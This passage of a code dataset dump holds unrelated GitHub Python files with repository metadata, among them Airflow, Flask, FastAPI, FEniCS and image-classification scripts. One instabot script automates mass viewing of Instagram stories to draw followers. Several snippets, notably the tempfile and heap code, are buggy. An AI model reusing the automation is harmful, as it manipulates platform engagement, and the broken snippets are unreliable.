get_longest_domain():\n \n top_data_df = pd.read_csv(TOP_1M_DOMAINS_FILE, names=['rank', 'domain'])\n list_of_domains = []\n domain_length = -1\n longest_domain_csv = pd.DataFrame()\n\n for i in range(top_data_df.shape[0]):\n if len(top_data_df.domain[i]) > domain_length:\n domain_length = len(top_data_df.domain[i]) \n \n for i in range(top_data_df.shape[0]):\n if len(top_data_df.domain[i]) == domain_length:\n list_of_domains.append(top_data_df.domain[i])\n\n list_of_domains.sort()\n longest_domain = list_of_domains[0]\n longest_domain = pd.Series(longest_domain)\n longest_domain_csv = longest_domain_csv.append(longest_domain, ignore_index=True)\n longest_domain_csv = longest_domain_csv.rename(columns={0: 'longest_domain'})\n \n with open('longest_domain_csv.csv', 'w') as f:\n f.write(longest_domain_csv.to_csv(index=False, header=False))\n \ndef get_top_airflow():\n \n top_data_df = pd.read_csv(TOP_1M_DOMAINS_FILE, names=['place_in_the_top', 'domain'])\n \n top_airflow = top_data_df.query(\"domain == 'airflow.com'\").place_in_the_top\n\n if not top_airflow.empty:\n top_airflow_csv = top_airflow\n\n else:\n top_airflow = 'airflow.com is not in top'\n top_airflow = pd.Series(top_airflow)\n top_airflow_csv = pd.DataFrame()\n top_airflow_csv = top_airflow_csv.append(top_airflow, ignore_index=True)\n top_airflow_csv = top_airflow_csv.rename(columns={0: 'airflow.com'})\n \n with open('top_airflow_csv.csv', 'w') as f:\n f.write(top_airflow_csv.to_csv(index=False, header=False))\n \ndef print_data(ds):\n \n with open('top_10_domain_zones.csv', 'r') as f:\n all_data_domain_zones = f.read()\n with open('longest_domain_csv.csv', 'r') as f:\n all_data_longest_domain = f.read()\n with open('top_airflow_csv.csv', 'r') as f:\n all_data_top_airflow = f.read()\n date = ds\n\n print(f'Top domain zones for date {date}')\n print(all_data_domain_zones)\n\n print(f'The longest_domain for date {date}')\n print(all_data_longest_domain)\n \n print(f'airflow.com top place for date {date}')\n print(all_data_top_airflow)\n\n \n\ndefault_args = {\n 'owner': 'p-annenkov',\n 'depends_on_past': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2022, 9, 1),\n}\nschedule_interval = '0 12 * * *'\n\ndag = DAG('p-annenkov_lesson_2_DAG', default_args=default_args, schedule_interval=schedule_interval)\n\nt1 = PythonOperator(task_id='get_data',\n python_callable=get_data,\n dag=dag)\n\nt2_d = PythonOperator(task_id='get_top_10_domain_zones',\n python_callable=get_top_10_domain_zones,\n dag=dag)\n\nt2_l = PythonOperator(task_id='get_longest_domain',\n python_callable=get_longest_domain,\n dag=dag)\n\nt2_a = PythonOperator(task_id='get_top_airflow',\n python_callable=get_top_airflow,\n dag=dag)\n\nt3 = PythonOperator(task_id='print_data',\n python_callable=print_data,\n dag=dag)\n\nt1 >> [t2_d, t2_l, t2_a] >> t3","repo_name":"ageichev/Portfolio","sub_path":"Jupiter notebook/mnt/HC_Volume_18315164/home-jupyter/jupyter-a-a-30/airflow/dags/p-annenkov/Pavel_Annenkov_3_lesson_Task_4.py","file_name":"Pavel_Annenkov_3_lesson_Task_4.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35854973643","text":"import time\nimport board\nimport terminalio\nfrom adafruit_matrixportal.matrixportal import MatrixPortal\n\n# You can display in 'GBP', 'EUR' or 'USD'\nCURRENCY = \"USD\"\n# Set up where we'll be fetching data from\nDATA_SOURCE = \"https://api.coindesk.com/v1/bpi/currentprice.json\"\nDATA_LOCATION = [\"bpi\", CURRENCY, \"rate_float\"]\n\n\ndef text_transform(val):\n if CURRENCY == \"USD\":\n return \"$%d\" % val\n if CURRENCY == \"EUR\":\n return \"‎€%d\" % val\n if CURRENCY == \"GBP\":\n return \"£%d\" % val\n return \"%d\" % val\n\n\n# the current working directory (where this file is)\ncwd = (\"/\" + __file__).rsplit(\"/\", 1)[0]\n\nmatrixportal = MatrixPortal(\n url=DATA_SOURCE,\n json_path=DATA_LOCATION,\n status_neopixel=board.NEOPIXEL,\n default_bg=cwd + \"/bitcoin_background.bmp\",\n debug=False,\n)\n\nmatrixportal.add_text(\n text_font=terminalio.FONT,\n text_position=(27, 16),\n text_color=0x3d1f5c,\n text_transform=text_transform,\n)\nmatrixportal.preload_font(b\"$012345789\") # preload numbers\nmatrixportal.preload_font((0x00A3, 0x20AC)) # preload gbp/euro symbol\n\nwhile True:\n try:\n value = matrixportal.fetch()\n print(\"Response is\", value)\n except (ValueError, RuntimeError, ConnectionError, OSError) as e:\n print(\"Some error occured, retrying! -\", e)\n\n time.sleep(3 * 60) # wait 3 minutes\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"Bitcoin_Matrix/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"40406889331","text":"\"\"\"\n Watch user likers stories!\n This script could be very useful to attract someone's audience to your account.\n If you will not specify the user_id, the script will use your likers as targets.\n Dependencies:\n pip install -U instabot\n Notes:\n You can change file and add there your comments.\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport random\n\n# in case if you just downloaded zip with sources\nsys.path.append(os.path.join(sys.path[0], '../../'))\nfrom instabot import Bot\n\nbot = Bot()\nbot.login()\n\nif len(sys.argv) >= 2:\n bot.logger.info(\n \"\"\"\n Going to get '%s' likers and watch their stories (and stories of their likers too).\n \"\"\" % (sys.argv[1])\n )\n user_to_get_likers_of = bot.convert_to_user_id(sys.argv[1])\nelse:\n bot.logger.info(\n \"\"\"\n Going to get your likers and watch their stories (and stories of their likers too).\n You can specify username of another user to start (by default we use you as a starting point).\n \"\"\"\n )\n user_to_get_likers_of = bot.user_id\n\ncurrent_user_id = user_to_get_likers_of\n\ntext_file = open('id_smotr.txt', 'r')\nlines = text_file.read().splitlines()\na = 0\n\nwhile True:\n try:\n\n b = a + 10\n liker_ids = lines[a:b]\n\n # WATCH USERS STORIES\n if bot.watch_users_reels(liker_ids):\n bot.logger.info(\"Total stories viewed: %d\" % bot.total[\"stories_viewed\"])\n\n # CHOOSE RANDOM LIKER TO GRAB HIS LIKERS AND REPEAT\n current_user_id = random.choice(liker_ids)\n a += 10\n\n if random.random() < 0.05:\n current_user_id = user_to_get_likers_of\n bot.logger.info(\"Sleeping and returning back to original user_id=%s\" % current_user_id)\n time.sleep(90 * random.random() + 60)\n if b >= len(lines):\n print('Завершение программы, весь список пройден')\n break\n\n except Exception as e:\n # If something went wrong - sleep long and start again\n bot.logger.info(e)\n current_user_id = user_to_get_likers_of\n time.sleep(240 * random.random() + 60)\n","repo_name":"zoozx/insta","sub_path":"Watch_users_story.py","file_name":"Watch_users_story.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15757195376","text":"\nclass nodeWithIndex:\n \n def __init__(self, data, index):\n \n self.data = data\n self.index = index\n\n\nclass auxHeap:\n \n aux = [nodeWithIndex(data=float('+inf'), index=0)] * 0\n \n def length(self):\n \n return len(self.aux)\n \n #trovo il minimo della heap\n def getmin(self):\n \n assert len(self.aux) > 0, \"Heap Vuota\"\n return self.aux[0].data, self.aux[0].index #il minimo di una aux sta in prima posizione\n \n #estraggo un elemento dalla heap\n def extract(self):\n \n self.aux.pop(0) #tolgo soltanto l'ultimo elemento dell'array, e me lo ritorna\n\n if len(self.aux) > 0:\n self.heapify(0)\n \n #inserisce un elemento nella heap portandolo nel posto giusto\n def insert(self, x, i):\n \n n = nodeWithIndex(data= x, index = i)\n \n self.aux.append(n) #aggiungo in coda all'array\n self.moveUp(len(self.aux) - 1) #sposto il nuovo nodo dove effettivamente serve\n \n \n #costruisce la Heap dal vettore\n def buildHeap(self, a):\n \n self.aux = a.copy()\n \n for i in range (len(self.aux) -1, -1, -1):\n self.heapify(i)\n \n \n #modifico un elemento all'interno della heap \n def change(self, i, x):\n \n assert i < len(self.aux), \"errore nell'index\"\n \n if x[0] < self.aux[i]:\n self.aux[i][0] = x[0]\n self.moveUp(i)\n elif x[0] > self.aux[i][0]:\n self.aux[i][0] = x[0]\n self.heapify(i)\n \n #correzione della Heap VERSO IL BASSO\n def heapify(self, i):\n left = 2*i +1 \n right = 2*i +2\n \n argMin = i #posizione dell'elemento corrente\n \n if left < len(self.aux) and self.aux[left][0] < self.aux[argMin][0]:\n argMin = left\n \n if right < len(self.aux) and self.aux[right][0] < self.aux[argMin][0]:\n argMin = right\n \n if i != argMin:\n self.aux[i][0], self.aux[argMin][0] = self.aux[argMin][0], self.aux[i][0]\n self.heapify(argMin)\n \n \n #sposta il nodo nel posto giusto all'interno della heap, VERSO L'ALTO\n def moveUp(self, i):\n \n if i == 0:\n return \n \n parent = (i + 1) // 2 -1\n \n if self.aux[i].data < self.aux[parent].data:\n self.aux[i].data, self.aux[parent].data = self.aux[parent].data, self.aux[i].data\n \n self.moveUp(parent)\n \n","repo_name":"riccardosantarossa/UNI_Python","sub_path":"es15/auxHeap.py","file_name":"auxHeap.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73277585432","text":"import json\nfrom flask import make_response, jsonify, request, Blueprint\nfrom app.api.v1.models.add_hotels import HotelsModel\nfrom app.api.v1.models.users_model import UsersModel\nfrom utils.v1.validations import check_hotels_keys, raise_error, convert_to_int\nfrom flask_jwt_extended import jwt_required\n\nhotels_v1 = Blueprint('hotels_v1', __name__)\n\n\n@hotels_v1.route('/hotels', methods=['POST'])\n@jwt_required\ndef add_hotel():\n \"\"\"A registered user can book a hotel.\"\"\"\n errors = check_hotels_keys(request)\n if errors:\n return raise_error(400, \"Invalid {} key\".format(', '.join(errors)))\n details = request.get_json()\n name = details['name']\n location = details['location']\n lodges = details['lodges']\n conference_rooms = details['conference_rooms']\n img_url = details['img_url']\n category = details['category']\n\n hotel = HotelsModel(name, location, lodges, conference_rooms, img_url, category).save()\n hotel = json.loads(hotel)\n return make_response(jsonify({\n \"status\": \"201\",\n \"message\": \"You have successfully booked the hotel!\",\n \"hotel\": hotel\n }), 201)\n\n@hotels_v1.route('/hotels', methods=['GET'])\n@jwt_required\ndef get_all_hotels():\n '''Fetch all the existing hotels.'''\n\n return make_response(jsonify({\n \"status\": \"200\",\n \"message\": \"success\",\n \"hotels\": json.loads(HotelsModel().get_hotels())\n }), 200)\n\n@hotels_v1.route('/hotels/', methods=['GET'])\n@jwt_required\ndef get_hotel(name):\n \"\"\"Fetch a specific hotel.\"\"\"\n\n hotel = HotelsModel().get_hotel(name)\n hotel = json.loads(hotel)\n if hotel:\n return make_response(jsonify({\n \"status\": \"200\",\n \"message\": \"success\",\n \"hotel\": hotel\n }), 200)\n return make_response(jsonify({\n \"status\": \"404\",\n \"message\": \"hotel not found\"\n }), 404)\n","repo_name":"Arrotech/BookIt","sub_path":"app/api/v1/views/add_hotels.py","file_name":"add_hotels.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7111449302","text":"# -*- coding: utf-8 -*-\nfrom fastapi import FastAPI\nfrom dto_request import CommentPredictionRequest\nfrom predict import predict_comment\n\napp = FastAPI()\n\n@app.get(\"/health_check\")\nasync def health_check():\n\treturn {\"message\": \"ok\"}\n\n@app.post(\"/comment/predictions\")\nasync def oneBookPredict(item:CommentPredictionRequest):\n res = {}\n # res[\"comment_id\"] = item.comment_id\n preds = predict_comment(item.text)\n res[\"predictions\"] = preds\n return res\n","repo_name":"nhoxlove2k15/sentiment-analyst-comment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73354060313","text":"from flask import Flask, jsonify, render_template\nfrom flask import request\nfrom flask_cors import CORS\n\nfrom recommender import make_recommendation\nimport requests\n\n\napp = Flask(__name__, template_folder=\"./\")\nCORS(app)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/get\")\ndef get_movie():\n # searchTerms = ['horror', 'tomcruise', 'jamescameron', 'blood boat romance magic']\n genre = request.args.get(\"genre\").replace(\" \", \"\")\n actor = request.args.get(\"actor\").replace(\" \", \"\")\n director = request.args.get(\"director\").replace(\" \", \"\")\n keywords = request.args.get(\"keywords\").replace(\" \", \"\").split(\",\")\n keywords = \" \".join(keywords)\n searchTerms = [genre, actor, director, keywords]\n print(\"HELLo\", searchTerms)\n res = make_recommendation(searchTerms=searchTerms)\n res2 = [{\"name\": i[0], \"id\": i[1]} for i in res]\n print(res2)\n return jsonify({\"movies\": res2})\n # return res2\n # return \"Web App with Python Flask!\"\n\n\napp.run(debug=True)\n","repo_name":"YashKarnik/movie-recommendation","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36342232081","text":"# Import necessary modules from the transformers library and PIL (Python Imaging Library).\nfrom transformers import ViTImageProcessor, ViTForImageClassification\nfrom PIL import Image as img # used for opening the image.\n\"\"\"\n#ViTForImageClassification\nThe ViTForImageClassification class works by taking an input image, passing it through the pre-trained Vision Transformer layers,\nand producing a probability distribution over predefined class labels,\nallowing it to classify the image into one of those classes based on the learned features.\n\n#ViTImageProcessor\nThis class is part of the Hugging Face Transformers library and is used for preprocessing and\nhandling images before they are input into a Vision Transformer (ViT) model. ( resize, normalize,)\n Define the file name of the image you want to test.\n\"\"\"\nFILE_NAME = 'image_to_test_3.jpg'\n\n# Open the image file using PIL and store it in an image array.\nimage_array = img.open(FILE_NAME) # converts the image in the NumPy array format for manipulation.\n\n# Create a ViTImageProcessor object from a pre-trained ViT model. This processor is used for image pre-processing.\nprocessor = ViTImageProcessor.from_pretrained('google/vit-base-patch16-224')\n\n# Create a ViTForImageClassification model from a pre-trained ViT model. This model is used for image classification.\nmodel = ViTForImageClassification.from_pretrained('google/vit-base-patch16-224')\n\n# Preprocess the input image using the ViTImageProcessor. It converts the image into a format suitable for the model.\n# \"return_tensors='pt'\" specifies that the output should be PyTorch tensors.\ninputs = processor(images=image_array, return_tensors=\"pt\")\n\n# Pass the preprocessed input through the ViTForImageClassification model to obtain predictions.\noutputs = model(**inputs)\n\"\"\"\npassing the inputs to the ViT model using double asterisks (**),\nwhich is Python's syntax for unpacking dictionary-like arguments. \nThis means that you're providing the model with the necessary input data in the format it expects.\n\"\"\"\n# Extract the logits (raw model outputs) from the model's output.\nlogits = outputs.logits\n\"\"\"\nLogits are raw model outputs representing unnormalized scores for each class in an image classification task.\nThey are essential as they capture the model's confidence for each class, helping identify the most likely class.\nLogits are typically transformed into probabilities (e.g., using softmax) to make the final classification decision, \naiding accurate image classification.\n\"\"\"\n# Find the index of the class with the highest probability from the logits.\npredicted_class_idx = logits.argmax(-1).item()\n\n# Retrieve the label associated with the predicted class index using the model's configuration.\n# This assumes that the model's configuration includes a mapping from class indices to labels.\nprint(\"Predicted class index:\", predicted_class_idx)\nprint(\"Predicted class:\", model.config.id2label[predicted_class_idx])","repo_name":"ishaanjoshi2002/cautious-computing-machine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73101923992","text":"from exif import Image\nimport folium\nfrom folium.plugins import MarkerCluster\nfrom folium.plugins import MarkerCluster\nimport pandas as pd\n\n\noutputfile = 'photo_reader_output/test.txt'\nfolder_path = 'photos'\nimg_filename = 'CI-mg108283-before.jpg'\nimg_path = f'{folder_path}/{img_filename}'\npopup_data = 'mg108283'\n\ndef dms_to_dd(d, m, s):\n dd = d + float(m)/60 + float(s)/3600\n return dd\n\nwith open(img_path, 'rb') as img_file:\n img = Image(img_file)\n\nlist = sorted(img.list_all())\n#liststring = '/n'.join(map(str,list))\n\n\n#with open(outputfile, 'w' ) as f: \n # f.write(liststring)\nprint(list)\nxcoord = img.get(\"gps_latitude\")\nxcoordref = img.get(\"gps_latitude_ref\")\nycoord = img.get(\"gps_longitude\")\nycoordref = img.get(\"gps_longitude_ref\")\ndatetime = img.get(\"datetime\")\n\nprint(xcoord)\n\nddx = dms_to_dd(xcoord[0], xcoord[1], xcoord[2])\nddy = dms_to_dd(ycoord[0], ycoord[1], ycoord[2])\n\nprint(ycoordref)\n\nif xcoordref == \"S\":\n x = \"-\"+ str(ddx[0])\n x = float(x)\nelse:\n x = ddx\n\nif ycoordref == \"W\":\n y = \"-\"+ str(ddy)\n y = float(y)\n \nelse:\n y = ddy\n\n\nprint(x,xcoordref, \" , \" ,y, ycoordref, datetime)\n\nphoto_coords = [x, y]\nprint(photo_coords)\n\nmap = folium.Map(\n location = photo_coords, \n zoom_start=15,\n tiles='https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}',\n attr='Esri')\n\nfolium.Marker(\n photo_coords, \n popup = popup_data, \n tooltip='click').add_to(map)\n\n\nmap.save('photo_reader_output/map_test.html')\nmap","repo_name":"henry-the-cudweed/henry-the-cudweed.github.io","sub_path":"slider_creator/photo_reader.py","file_name":"photo_reader.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25325242930","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 2 08:34:52 2018\n\n@author: bradenaltstatt\n\"\"\"\n\nintNum = int(input(\"Please enter an integer: \"));\nneg = False;\n\nif intNum < 0:\n neg = True;\n\nroot = 0;\npwr = 2;\n\nprint(\"The integer is: \", intNum);\n# Will always have at least one root/pwr such that intNum=root and pwr = 1\nprint (\"rootFOUND: \", intNum, \" pwrFOUND : \", 1);\n\nwhile 0 < pwr < 6:\n while root**pwr <= abs(intNum):\n# print (\"root: \", root, \" pwr: \", pwr);\n if root**pwr == abs(intNum):\n if neg and pwr%2 != 0:\n print (\"rootFOUND: \", -root, \" pwrFOUND : \", pwr);\n elif not neg:\n print (\"rootFOUND: \", root, \" pwrFOUND : \", pwr);\n root += 1;\n pwr += 1;\n root = 0;\n\n\n\n\n#while (currentInput != root**pwr):\n# print (\"root: \", root, \" pwr : \", pwr);\n# if pwr == 5:\n# pwr = 0;\n# root = root + 1;\n# \n# pwr = pwr + 1;\n \n#print(\"The integer is : \", currentInput);\n#print(\"The root is : \", root);\n#print(\"The pwr is : \", pwr);\n\n\n\n\n\n","repo_name":"bradenaa/MITOCW","sub_path":"6.0001 Introduction to Computer Science and Programming in Python/Readings/exhaustiveROOTpwr.py","file_name":"exhaustiveROOTpwr.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27638567706","text":"import nibabel\nfrom dolfin import *\nfrom dolfin_adjoint import *\nimport pathlib\nimport numpy\nfrom nibabel.affines import apply_affine\nimport abc\nimport os\nfrom datetime import datetime\n\nfirsts = {\n \"068\": '20160912_080147',\n \"002\": '20151007_075055',\n \"078\": '20161031_074500',\n \"091\": '20170116_074933',\n \"127\": '20170925_075956',\n \"172\": '20180212_081154',\n \"249\": '20191111_075145',\n \"105\": '20170508_081611',\n \"175\": '20180416_080959',\n \"176\": '20180514_080612',\n \"178\": '20180430_075417',\n \"183\": '20181029_074933',\n \"190\": '20180528_074812',\n \"191\": '20180806_080756',\n \"205\": '20181008_074949',\n \"215\": '20190128_073807',\n \"218\": '20190114_074903',\n \"228\": '20190304_074149',\n \"240\": '20191028_074716',\n \"199\": '20190916_075735',\n \"227\": '20190401_074904',\n \"230\": '20190527_075031',\n \"235\": '20190603_075620',\n \"236\": '20190624_081053',\n \"241\": '20191216_075927'\n }\n\n\nTmax = 2.5 * 24 * 3600\nparameters['allow_extrapolation'] = True\n\ndef find_files(pat, concfolder, data_folder):\n folder = data_folder + '/%s/' % pat + concfolder + '/'\n files = os.listdir(folder)\n new_files = [folder + files[i]\n for i in range(len(files)) if files[i].startswith('2')]\n new_files = sorted(new_files)\n return new_files\n\ndef get_delta_t(f1, f2):\n frmt = '%Y%m%d_%H%M%S'\n A1 = f1.split(\"/\")[-1]\n A2 = f2.split(\"/\")[-1]\n\n try:\n date_time1 = A1.split('_concentration')[0]\n date_time2 = A2.split('_concentration')[0]\n date_obj1 = datetime.strptime(date_time1, frmt)\n date_obj2 = datetime.strptime(date_time2, frmt) \n except ValueError:\n date_time1 = A1.split('_masked_increase')[0]\n date_time2 = A2.split('_masked_increase')[0]\n date_obj1 = datetime.strptime(date_time1, frmt)\n date_obj2 = datetime.strptime(date_time2, frmt)\n\n\n \n difference = date_obj2 - date_obj1\n time = difference.days * 3600 * 24 + difference.seconds\n return time\n\n\ndef float_to_filestring(t):\n \"\"\"format t to have two digits before and two digits after comma\n\n Args:\n t ([type]): [description]\n\n Returns:\n string: formated time\n \"\"\"\n if type(t) == str:\n t = float(t)\n t = format(t, \".2f\")\n if len(t) < 5:\n t = \"0\" + t\n return t\n\n\n\ndef interpolate_bc_guess(data, k, params):\n \n t_ = 0\n g_list = []\n idx = 0\n g0 = Function(data.function_space)\n\n # extended_data = data\n data.measurements[\"0.00\"] = g0\n data.time_filename_mapping[\"0.00\"] = None\n\n \n for i in range(k):\n # print(idx)\n t_ += params[\"dt\"]\n\n if t_ > data.measurement_points()[idx + 1] and not (t_ > params[\"T\"]):\n idx += 1\n\n g = Function(data.function_space)\n \n g_i = data.get_measurement(data.measurement_points()[idx]).vector()[:]\n g_ii = data.get_measurement(data.measurement_points()[idx + 1]).vector()[:]\n t_i = data.measurement_points()[idx]\n t_ii = data.measurement_points()[idx + 1]\n inter_dt = t_ii - t_i\n # print(\"t_i\", t_i, \"t,\", t_, \"t_ii\", t_ii)\n \n g.vector()[:] = g_i + (t_ - t_i) * (g_ii - g_i) / inter_dt\n # print(t_, t_i, t_ii, (t_ - t_i))\n\n g_list.append(g)\n\n\n data.measurements.pop(\"0.00\")\n data.time_filename_mapping.pop(\"0.00\")\n\n\n return g_list\n\n\ndef load_fenics_files(functionspace, hdfs, mesh2path, keys_to_load=None):\n \"\"\"_summary_\n\n Args:\n functionspace (FunctionSpace): Space to project loaded functions onto\n hdfs (_type_): folder to hdf files storing the solution\n mesh2path (_type_): path to mesh \n keys_to_load (_type_, optional): If not None, load only specific timepoints\n\n Returns:\n _type_: _description_\n \"\"\"\n\n simulations = {}\n\n mesh2 = Mesh(mesh2path)\n V = FunctionSpace(mesh2, \"CG\", 2)\n\n files = sorted(os.listdir(hdfs), key=lambda x: float(x[:-7]))\n\n if keys_to_load is not None:\n files_ = []\n for file in files:\n t = float_to_filestring(float(file[:-7]) / 3600)\n if t in keys_to_load:\n files_.append(file)\n files = files_\n\n assert len(files) > 1\n\n print(\"Will load files:\")\n for file in files:\n print(file)\n\n for file in files:\n \n t = float_to_filestring(float(file[:-7]) / 3600)\n\n fun = Function(V)\n hdf5 = HDF5File(mesh2.mpi_comm(), hdfs + file, \"r\")\n hdf5_name = \"u\"\n if not hdf5_name.startswith(\"/\"):\n hdf5_name = \"/\" + hdf5_name\n \n hdf5.read(fun, hdf5_name)\n hdf5.close()\n\n simulations[t] = project(fun, V=functionspace)\n \n return simulations\n\n\n\n\n\ndef read_image(filename, space, data_filter=None):\n \n print(\"Loading\", filename)\n \n image2 = nibabel.load(filename)\n data = image2.get_fdata()\n\n\n u_data = Function(space)\n ras2vox = image2.header.get_ras2vox()\n\n ras2vox_tkr_inv = numpy.linalg.inv(image2.header.get_vox2ras_tkr())\n # if tkr is True:\n # ras2vox = ras2vox_tkr_inv\n ras2vox = ras2vox_tkr_inv\n\n xyz = space.tabulate_dof_coordinates()\n ijk = apply_affine(ras2vox, xyz).T\n i, j, k = numpy.rint(ijk).astype(\"int\")\n \n if data_filter is not None:\n data = data_filter(data, ijk, i, j, k)\n u_data.vector()[:] = data[i, j, k]\n else:\n\n print(\"No filter used, setting\", numpy.where(numpy.isnan(data[i, j, k]), 1, 0).sum(), \"/\", i.size, \" nan voxels to 0\")\n data[i, j, k] = numpy.where(numpy.isnan(data[i, j, k]), 0, data[i, j, k])\n u_data.vector()[:] = data[i, j, k]\n\n return u_data\n\n\n\nclass Measurements(abc.ABC):\n def __init__(self, function_space, expected_D=None):\n \n self.function_space = function_space\n # mesh = function_space.mesh()\n self.expected_D = expected_D\n\n def get_measurement(self, t):\n raise NotImplementedError\n # u = Function(self.function_space)\n # return u\n \n def measurement_points(self):\n raise NotImplementedError\n # return []\n\n def dump_pvd(self, vtkpath):\n \"\"\"Dump all data snapshots to a pvd file\n\n Args:\n vtkpath (str): Path to export to, without file extension. Example: /home/tux/test_measurements\n \"\"\"\n\n assert not os.path.isdir(vtkpath)\n assert not vtkpath.endswith(\"/\")\n \n u_ = Function(self.function_space)\n\n vtkfile = File(vtkpath + '.pvd')\n \n for t in self.measurement_points():\n u = self.get_measurement(t)\n u_.assign(u)\n vtkfile << u_\n\n\n\n\nclass MRI_Measurements(Measurements):\n\n def __init__(self, params, \n data_filter, print_message=True,\n *args, **kwargs):\n \n super(MRI_Measurements, self).__init__(*args, **kwargs)\n \n self.params = params\n\n self.print_message = print_message\n\n files = sorted(find_files(params[\"pat\"], params[\"concfolder\"], data_folder=params[\"path_to_files\"]))\n\n if params[\"concfolder\"] == \"FIGURES\":\n assert False not in [\"_masked_increase\" in x for x in files]\n files = [firsts[params[\"pat\"]] + \"_masked_increase\"] + [pathlib.Path(x).stem for x in files]\n\n else:\n assert False not in [\"concentration\" in x for x in files]\n\n files = [firsts[params[\"pat\"]] + \"_concentration\"] + [pathlib.Path(x).stem for x in files]\n\n self.time_filename_mapping = {}\n\n for _, f in enumerate(files[1:]):\n\n dt = get_delta_t(files[0], f)\n\n if dt > Tmax:\n print(\"Omit image\", f)\n continue\n \n key = self.timeformat(dt)\n\n self.time_filename_mapping[key] = f + \".mgz\"\n\n if self.print_message:\n\n print(\"Added \", key, \"=\", self.time_filename_mapping[key], \"to self.time_filename_mapping\")\n\n # NOTE \"00.00\" is the IC, should not be included here\n assert dt > 0\n\n self.data_filter = data_filter\n\n self.read_fun = read_image\n\n self.measurements = {}\n\n\n def timeformat(self, t):\n return format(t, \".2f\")\n\n def get_measurement(self, t):\n\n try:\n t = self.timeformat(t)\n return self.measurements[t]\n\n except KeyError:\n \n if isinstance(t, float):\n t = self.timeformat(t)\n\n assert t in self.time_filename_mapping.keys()\n \n filename = self.params[\"path_to_data\"] + self.time_filename_mapping[t]\n\n self.measurements[t] = self.read_fun(filename, space=self.function_space, data_filter=self.data_filter)\n \n return self.measurements[t]\n \n def measurement_points(self):\n \n return sorted(list(map(lambda x: float(x), list(self.time_filename_mapping.keys()))))\n\n","repo_name":"bzapf/braintransport","sub_path":"diffusion_reaction_simulations/measurements.py","file_name":"measurements.py","file_ext":"py","file_size_in_byte":8919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"72229722073","text":"#!/usr/bin/env python3\n\n# Python 3.9.5\n\n# 18_non_persistant_temporary_file.py\n\n# Dependency\nfrom tempfile import NamedTemporaryFile\n\nwith TemporaryFile('w+t', encoding='utf-8', errors='ignore') as tempfile:\n \n tempfile.write('Hello World!\\n')\n tempfile.seek(0)\n content = tempfile.read()\n \n print(data)\n\n# The non-persistent temporary file is now deleted.\n","repo_name":"fenceMeshwire/python_os_filesystem","sub_path":"18_non_persistant_temporary_file.py","file_name":"18_non_persistant_temporary_file.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29474912251","text":"import csv\nimport os\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb=scoped_session(sessionmaker(bind=engine))\n\ndef main():\n bookdata=open(\"books.csv\")\n reader = csv.reader(bookdata)\n for isbn, title, author, pubyear in reader:\n db.execute(\"INSERT INTO books (isbn, title, author, pubyear) VALUES (:isbn, :title, :author, :pubyear)\", {\"isbn\": isbn, \"title\": title, \"author\": author, \"pubyear\": pubyear})\n print(f\"Added {title} by {author}\")\n db.commit()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"7GAcc/ENGO551_lab1","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24435562997","text":"#from flask_jwt_extended import get_jwt_identity, get_jwt_claims, jwt_required, verify_jwt_in_request\nfrom functools import wraps\nfrom app import JSONAPIResponseFactory\nfrom flask import request\n\nfrom app.api.route_registrar import json_loads\n\n\nerror_401 = JSONAPIResponseFactory.make_errors_response(\n {\n \"status\": 401,\n \"title\": \"Unauthorized\"\n },\n status=401\n)\n\n\ndef error_400(s):\n return JSONAPIResponseFactory.make_errors_response(\n {\n \"status\": 400,\n \"title\": \"Bad request\",\n \"detail\": s\n },\n status=400\n )\n\n\ndef error_403(s):\n return JSONAPIResponseFactory.make_errors_response(\n {\n \"status\": 403,\n \"title\": \"Forbidden\",\n \"detail\": s\n },\n status=403\n )\n\n\ndef export_to(export_funcs):\n def wrap(view_function):\n @wraps(view_function)\n def wrapped_f(*args, **kwargs):\n response = view_function(*args, **kwargs)\n if \"export\" in request.args:\n asked_format = request.args[\"export\"]\n if asked_format not in export_funcs:\n return error_400('Export format unknown or 